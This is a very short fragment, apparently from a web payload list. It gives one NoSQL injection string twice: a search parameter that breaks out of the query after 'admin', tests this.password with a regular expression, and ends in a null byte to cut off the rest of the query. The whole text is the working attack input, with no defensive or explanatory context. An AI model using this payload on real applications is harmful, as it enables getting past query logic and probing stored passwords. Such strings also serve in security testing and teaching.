Payload: ?search=admin' && this.password.match(/^.*$/)%00
?search=admin' && this.password.match(/^.*$/)%00